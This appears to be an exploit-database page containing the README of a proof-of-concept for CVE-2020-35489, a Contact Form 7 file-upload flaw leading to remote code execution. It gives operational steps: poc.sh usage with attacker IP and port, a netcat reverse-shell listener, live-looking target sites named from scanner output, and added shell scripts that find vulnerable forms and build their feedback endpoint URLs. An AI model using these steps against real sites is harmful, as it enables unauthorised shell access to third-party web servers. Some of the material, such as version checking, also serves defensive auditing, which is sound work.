POC details: 9e4c67158d55f7955ea6657d148d447df6c056d0

Source
Related vulnerability
Title: WordPress contact-form-7 code issue vulnerability (CVE-2020-35489)
Description: contact-form-7 (aka Contact Form 7) is a WordPress plugin that provides contact forms. Versions of the plugin before 5.3.2 contain a vulnerability that allows unrestricted file upload and remote code execution because an uploaded filename may contain special characters.
Description
poc-CVE-2020-35489
Introduction
# CVE-2020-35489 POC

![sploit](images/poc-CVE-2020-35489-running-sploit.svg)

![shell](images/poc-CVE-2020-35489-revshell.svg)

## About

* https://nvd.nist.gov/vuln/detail/CVE-2020-35489
* https://blog.wpsec.com/contact-form-7-vulnerability/
* https://www.secpod.com/blog/wordpress-plugin-contact-form-7-critical-file-upload-vulnerability-cve-2020-35489/
* https://help.stoik.io/de/cve-2020-35489

## Usage

```bash
bash poc.sh url loc_ip loc_port
```

* `loc_ip` is the attacker machine IP that receives the reverse shell
* `loc_port` is the attacker machine port that receives the reverse shell
* `url` is the URL of the vulnerable form endpoint (not just the domain; see below)

## What is the vulnerable URL?

[nuclei](https://github.com/projectdiscovery/nuclei) detects this CVE as critical and reports it in the following form. It matches the plugin version published in `readme.txt` against the fixed version (5.3.2), so a hit means an old plugin, not a confirmed exploitable form (all example sites in this doc have since been fixed and are no longer vulnerable):

```text
[CVE-2020-35489] [http] [critical] https://ccp.org.ru:443/wp-content/plugins/contact-form-7/readme.txt [5.1.7]
[CVE-2020-35489] [http] [critical] https://ksmu.org.ru:443/wp-content/plugins/contact-form-7/readme.txt [5.1.7]
[CVE-2020-35489] [http] [critical] https://majestic.org.ru:443/wp-content/plugins/contact-form-7/readme.txt [4.6]
[CVE-2020-35489] [http] [critical] https://www.ccp.org.ru:443/wp-content/plugins/contact-form-7/readme.txt [5.1.7]
[CVE-2020-35489] [http] [critical] https://www.ksmu.org.ru:443/wp-content/plugins/contact-form-7/readme.txt [5.1.7]
```
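The nuclei hit above is a version match on the plugin's public `readme.txt`, and you can reproduce that check with a few lines of shell while keeping the comparison numeric (5.10 is newer than 5.3.2, which a plain string comparison gets wrong). The following is an added example, not code from the poc repository: `cf7_status_from_url` assumes the plugin sits at the standard `/wp-content/plugins/contact-form-7/` path, and the readme text in `cf7_sample_readme` is constructed here for offline use.

```shell
#!/bin/sh
# Added example (not part of the poc-CVE-2020-35489 repository).
# Classifies a Contact Form 7 install as vulnerable/patched/unknown from the
# "Stable tag:" line of its public readme.txt, the same data the nuclei
# template reports in brackets. Versions below 5.3.2 are in the affected range.

CF7_FIXED_VERSION=5.3.2

# version_lt A B: exit 0 if dotted version A < B, comparing segments
# numerically (missing segments count as 0), so 5.10 > 5.3.2 and 4.6 < 5.3.2.
version_lt() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        na = split(a, x, "."); nb = split(b, y, ".")
        n = (na > nb) ? na : nb
        for (i = 1; i <= n; i++) {
            xi = (i <= na) ? x[i] + 0 : 0
            yi = (i <= nb) ? y[i] + 0 : 0
            if (xi < yi) exit 0
            if (xi > yi) exit 1
        }
        exit 1   # equal is not "less than"
    }'
}

# cf7_stable_tag: print the version from the first "Stable tag:" line on stdin
# (tolerates CRLF line endings and trailing text).
cf7_stable_tag() {
    sed -n 's/^Stable tag:[[:space:]]*\([0-9][0-9.]*\).*/\1/p' | head -n 1
}

# cf7_status_from_readme: read readme.txt text on stdin and print
# "vulnerable <ver>", "patched <ver>" or "unknown".
cf7_status_from_readme() {
    tag=$(cf7_stable_tag)
    if [ -z "$tag" ]; then
        echo unknown
    elif version_lt "$tag" "$CF7_FIXED_VERSION"; then
        echo "vulnerable $tag"
    else
        echo "patched $tag"
    fi
}

# cf7_status_from_url SITE: fetch the live readme.txt (standard plugin path
# assumed) and classify it. Needs network access; not used by the offline run.
cf7_status_from_url() {
    curl -fsS --max-time 10 "${1%/}/wp-content/plugins/contact-form-7/readme.txt" \
        | cf7_status_from_readme
}

# Constructed readme excerpt in the shape WordPress plugins publish
# (not fetched from any real site).
cf7_sample_readme() {
    printf '=== Contact Form 7 ===\r\nStable tag: 5.1.7\r\nTested up to: 5.6\r\n'
}

cf7_sample_readme | cf7_status_from_readme   # prints: vulnerable 5.1.7
```

Run it against a live site with `cf7_status_from_url https://example.com`. A "patched" result only tells you the plugin version is at or above 5.3.2; a "vulnerable" result still has to be confirmed by finding a form with a file field, as the next section describes.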

The scanner does not give you the vulnerable URL, however. For the exploit to work, you need to do some research and find the page on the detected site that embeds a Contact Form 7 form.
For example, let's look at http://itws.ru/?page_id=29

![itws](images/itws.png)

When we submit the form, we can see the URL it posts to:

![itws](images/itws2.png)

This is what the poc script takes as its `url` parameter: `http://itws.ru/index.php?rest_route=/contact-form-7/v1/contact-forms/28/feedback`

For that site:

```bash
bash poc.sh http://itws.ru/index.php?rest_route=/contact-form-7/v1/contact-forms/28/feedback your_machine_ip your_ip_port
```
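Finding the form id by hand, as described above, can be scripted: a rendered Contact Form 7 form carries a hidden `_wpcf7` input whose value is the form's id (28 in the example), and the submission goes to the REST route `contact-form-7/v1/contact-forms/<id>/feedback`, reachable either as `/wp-json/...` on sites with pretty permalinks or as `index.php?rest_route=...` as shown above. The following is an added example, not code from the poc repository: the HTML in `cf7_sample_page` is constructed to match that markup, and the attribute order `name="_wpcf7" value="..."` is assumed.

```shell
#!/bin/sh
# Added example (not part of the poc-CVE-2020-35489 repository).
# Turns a page that embeds a Contact Form 7 form into the feedback endpoint
# URL(s) that poc.sh takes as its `url` argument.

# cf7_form_ids: print each form id found in HTML on stdin, one per line.
# Relies on the hidden <input type="hidden" name="_wpcf7" value="ID"> that
# CF7 renders inside every form (attribute order assumed).
cf7_form_ids() {
    grep -o 'name="_wpcf7"[[:space:]]*value="[0-9]*"' \
        | sed 's/.*value="\([0-9]*\)".*/\1/' \
        | sort -u
}

# cf7_plugin_version: print the plugin version the page itself advertises
# via the hidden _wpcf7_version input, or nothing if it is absent.
cf7_plugin_version() {
    grep -o 'name="_wpcf7_version"[[:space:]]*value="[0-9.]*"' \
        | sed 's/.*value="\([0-9.]*\)".*/\1/' \
        | head -n 1
}

# cf7_feedback_urls BASE: read HTML on stdin and print, per form id, the two
# ways the REST route can be addressed. Try the /wp-json/ form first and fall
# back to the rest_route query form if /wp-json/ is not routed on the site.
cf7_feedback_urls() {
    base=${1%/}
    cf7_form_ids | while read -r id; do
        echo "$base/wp-json/contact-form-7/v1/contact-forms/$id/feedback"
        echo "$base/index.php?rest_route=/contact-form-7/v1/contact-forms/$id/feedback"
    done
}

# cf7_sample_page: constructed HTML fragment in the shape CF7 renders
# (not captured from any real site).
cf7_sample_page() {
    cat <<'EOF'
<div class="wpcf7" id="wpcf7-f28-p29-o1" lang="en-US" dir="ltr">
<form action="/?page_id=29#wpcf7-f28-p29-o1" method="post" class="wpcf7-form">
<div style="display: none;">
<input type="hidden" name="_wpcf7" value="28" />
<input type="hidden" name="_wpcf7_version" value="5.1.7" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
</div>
<p><input type="file" name="your-file" size="40" class="wpcf7-form-control wpcf7-file" /></p>
</form>
</div>
EOF
}

# Live use: curl -fsS "http://itws.ru/?page_id=29" | cf7_feedback_urls http://itws.ru
cf7_sample_page | cf7_feedback_urls http://itws.ru
# prints:
# http://itws.ru/wp-json/contact-form-7/v1/contact-forms/28/feedback
# http://itws.ru/index.php?rest_route=/contact-form-7/v1/contact-forms/28/feedback
```

Two practical notes: the `_wpcf7_version` value gives you the plugin version straight from the page, so you can confirm the nuclei result without fetching `readme.txt`; and the exploit needs a form that actually has a file field (a `wpcf7-file` input, as in the sample), because a form without one has no upload handler to reach.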

## Reverse shell

If the exploit is successful, you get a shell connecting back to the specified IP and port.

### Example

You bought a cloud instance for the exploit whose IP is 145.21.32.5. You SSH into the instance and run `nc -l 11244` (OpenBSD netcat syntax; the traditional netcat wants `nc -l -p 11244`). From a second SSH session you run `poc.sh`:

```bash
bash poc.sh https://example.com/wp-url 145.21.32.5 11244
```

If the exploit is successful, the shell arrives at `nc` in the first SSH terminal. It runs as the web server's user (typically `www-data`), not as root, unless the server itself runs PHP as root.

If you test the PoC from **behind a router** (NAT), don't forget to **forward the port** on which the reverse shell listener is waiting, and make sure any cloud security group or host firewall allows inbound connections on it.
File snapshot

```text
[4.0K] /data/pocs/9e4c67158d55f7955ea6657d148d447df6c056d0
├── [4.0K] images
│   ├── [ 52K] itws2.png
│   ├── [404K] itws.png
│   ├── [ 13K] poc-CVE-2020-35489-revshell.svg
│   └── [ 47K] poc-CVE-2020-35489-running-sploit.svg
├── [ 39K] payload.pdf
├── [ 587] poc.sh
└── [2.6K] README.md

1 directory, 7 files
```